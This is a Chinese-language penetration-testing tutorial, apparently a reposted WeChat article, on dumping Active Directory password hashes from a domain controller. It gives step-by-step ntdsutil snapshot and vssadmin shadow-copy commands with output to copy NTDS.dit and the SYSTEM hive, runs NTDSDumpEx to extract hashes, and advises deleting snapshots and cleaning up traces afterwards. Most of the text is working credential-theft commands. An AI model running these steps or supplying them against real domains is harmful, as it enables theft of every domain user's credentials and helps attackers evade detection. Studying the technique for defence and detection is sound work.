转储域密码哈希值

No.1

声明

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者不为此承担任何责任。 雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。

No.2

前言

域用户的哈希值存储在域管服务器的NTDS.DIT的数据库文件中,除此之外还有用户信息和组成员信息。NTDS.dit文件无法直接复制到其他位置进行离线破解和提取(类似于本地存储的SYSTEM),其存储位置为:

C:\Windows\NTDS\NTDS.dit

本文主要介绍利用域管理服务器命令提取NTDS.dit文件,后续还会有其他工具的使用方法。

No.3

Ntdsutil快照

该工具域环境默认安装[Windows 2003 及以上]

查看当前快照列表

C:\Users\Administrator>ntdsutil snapshot "list all" quit quitntdsutil: snapshot快照: list all

找不到快照。

快照: quit

ntdsutil: quit

创建快照

C:\Users\Administrator>ntdsutil snapshot "activate instance ntds" create quit quitntdsutil: snapshot

快照: activate instance ntds

活动实例设置为“ntds”。

快照: create

正在创建快照...

成功生成快照集 {550f5e34-1952-475b-99ef-30ba80014363}。

快照: quit

ntdsutil

注:其中快照的guid需要取出来,挂载快照时使用

挂载快照

C:\Users\Administrator>ntdsutil snapshot "mount {550f5e34-1952-475b-99ef-30ba80014363}" quit quit

ntdsutil: snapshot

快照: mount {550f5e34-1952-475b-99ef-30ba80014363}快照 {b38c1255-073f-4124-a32f-75144555c3fd}

已作为 C:\$SNAP_201810172200_VOLUMEC$\ 装载快照: quit

ntdsutil: quit

注:机器中有几块硬盘,那么就会生成几个快照分区,快照分区会以$SNAP_时间_VOLUME{分区名}$进行命名

寻找ntds.dit

一般情况下会在c:\windows\ntds\ 目录下

注:注意看时间,一定要最近日期的,有一些域控机器上的ntds.dit很古老,那么可能是备份到其他目录下了,需要再找一下,可能…还会遇到磁盘空间不足的情况,自行斟酌。

拷贝ntds.dit

C:\Users\Administrator>copy C:\$SNAP_201810172200_VOLUMEC$\Windows\NTDS\ntds.dit c:\windows\temp\

已复制 1 个文件。

卸载快照

C:\Users\Administrator>ntdsutil snapshot "unmount {550f5e34-1952-475b-99ef-30ba80014363}" quit quit

ntdsutil: snapshot

快照: unmount {550f5e34-1952-475b-99ef-30ba80014363}

快照 {b38c1255-073f-4124-a32f-75144555c3fd} 已卸载。

快照: quit

ntdsutil: quit

删除快照

C:\Users\Administrator>ntdsutil snapshot "delete {550f5e34-1952-475b-99ef-30ba80014363}" quit quit

ntdsutil: snapshot

快照: delete {550f5e34-1952-475b-99ef-30ba80014363}快照 {b38c1255-073f-4124-a32f-75144555c3fd} 已删除。

快照: quit

ntdsutil: quit

获取注册表中的system文件

C:\Users\Administrator>reg save HKLM\SYSTEM c:\windows\temp\system.hiv

操作成功完成。

通过NtdsDumpex.exe提取域用户hash

C:\Users\Administrator>c:\windows\temp\NTDSDumpEx.exe -d c:\windows\temp\ntds.dit -s c:\windows\temp\system.hiv -o c:\windows\temp\hash.txt -hntds.dit hashes off-line dumper v0.3.Part of GMH's fuck Tools,Code by zcgonvh.

[+]use hive file: c:\windows\temp\system.hiv

[+]SYSKEY = 09135AC2D70C07F0984CF71599F7D947

[+]PEK version: 2k3

[+]PEK = 57C4CDE20126F6BE8B6FFE5649178339

[+]dump completed in 0.172 seconds.

注:这里hash.txt就是我们想要的用户hash

拷贝hash

全部结束之后记得清理现场

小福利:一句话版本

ntdsutil "ac in ntds" "ifm" "cr fu c:\windows\temp\temp\" q q

No.4

VSSADMIN卷影副本

卷影副本是Windows命令行一种即便被操作系统使用也能够用于管理员备份计算机,卷,文件的实用程序。卷影复制作为服务运行,并要求将文件系统格式化为NTFS,默认情况在所有现代操作系统下都是如此。从Windows命令提示符执行以下操作将创建C:驱动器盘的快照,以便用户访问通常无法访问这些文件,并将其其复制到另一个位置(本地文件夹,网络文件夹或可移动介质)。

注:要有管理员权限

查看卷影列表:

C:\Users\Administrator>vssadmin list shadowsvssadmin 1.1 - 卷影复制服务管理命令行工具(C) 版权所有 2001-2005 Microsoft Corp. 卷影副本集 ID: {9ddcbac4-00c2-4383-add4-abb96e190399} 的内容

在创建时间: 2018/9/7 22:48:01 含有 1 个卷影副本 卷影副本 ID: {e32bb2a2-5033-40cf-9892-5b49d6f5611c}

原始卷: (C:)\\?\Volume{f73dd843-9b04-11e8-99c6-806e6f6e6963}\

卷影副本卷: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 源起机器: WIN-1O417SEMSD5.test.com

服务机器: WIN-1O417SEMSD5.test.com

提供程序: 'Microsoft Software Shadow Copy provider 1.0'

类型: ClientAccessible

属性: 持续, 客户端可问

创建卷影列表:

C:\Users\Administrator>vssadmin create shadow /for=c:vssadmin 1.1 - 卷影复制服务管理命令行工具

(C) 版权所有 2001-2005 Microsoft Corp.

成功地创建了 'c:\' 的卷影副本

卷影副本 ID: {e32bb2a2-5033-40cf-9892-5b49d6f5611c}

卷影副本卷名: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1

获取NDTS.dit和SYSTEM:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\

C:\Users\Administrator>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\

已复制 1 个文件。

C:\Users\Administrator>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\

已复制 1 文件。

删除卷影列表:

C:\Users\Administrator>vssadmin Delete Shadows /For=C:vssadmin 1.1 - 卷影复制服务管理命令行工具

(C) 版权所有 2001-2005 Microsoft Corp.

确实要删除 1 卷影副本吗(Y/N): [N]? Y

成功地删了

打包拷贝!Get

END

本文分享自微信公众号 - 安恒网络空间安全讲武堂(cyberslab)

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2019-09-17

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • group by..with rollup学习实例

    首先打开题目,发现 index.php 是登录界面,寻找 register.php,表单内容如下

    安恒网络空间安全讲武堂
  • 适合破解新手的160个crackme练手之01

    适合破解新手的 160个crackme练手之01 无意中在网上找到了适合新手的160个crackme,所以想着来练手,感觉用来学习逆向很不错 首先打开exe,看...

    安恒网络空间安全讲武堂
  • MongoDB操作&&注入漏洞&&未授权访问漏洞

    注入不止有传统的SQL数据库,NoSQL型数据库也一样存在注入漏洞,在比赛中跟传统的注入相比也算新题型,不少同学可能还不太了解,本文向大家科普MongoDB数据...

    安恒网络空间安全讲武堂
  • linux-创建/使用快照/克隆(类似windows中备份还原)

    小小咸鱼YwY
  • 概率论10 方差与标准差

    除了期望,方差(variance)是另一个常见的分布描述量。如果说期望表示的是分布的中心位置,那么方差就是分布的离散程度。方差越大,说明随机变量取值越离散。 ?...

    Vamei
  • NEST2016-抉择VR电竞大赛上海站竞争激烈,比赛压轴项目为PVP版《黑盾》

    VRPinea
  • 如何在Ubuntu 14.04上创建和使用MongoDB备份

    今天许多现代Web应用程序开发人员都选择在他们的项目中使用NoSQL数据库,而MongoDB通常是他们的首选。如果您在生产场景中使用MongoDB,则定期创建备...

    藕丝空间
  • 如何在CDH集群使用HDFS快照

    HDFS中可以对目录创建Snapshot,创建之后不管后续目录发生什么变化,都可以通过快照找回原来的文件和目录结构,那么在CDH集群中如何使用HDFS的快照功能...

    Fayson
  • VR线下体验店已进入反思期,“内容为王”才是制胜关键

    镁客网
  • Excel实战技巧68:创建级联列表框(使用ADO技巧)

    在《Excel实战技巧67:在组合框中添加不重复值(使用ADO技巧)》中,我们使用记录集技巧给组合框添加了不重复值,并概要讲述了ADO记录集基础知识。本文利用记...

    fanjy

扫码关注云+社区

领取腾讯云代金券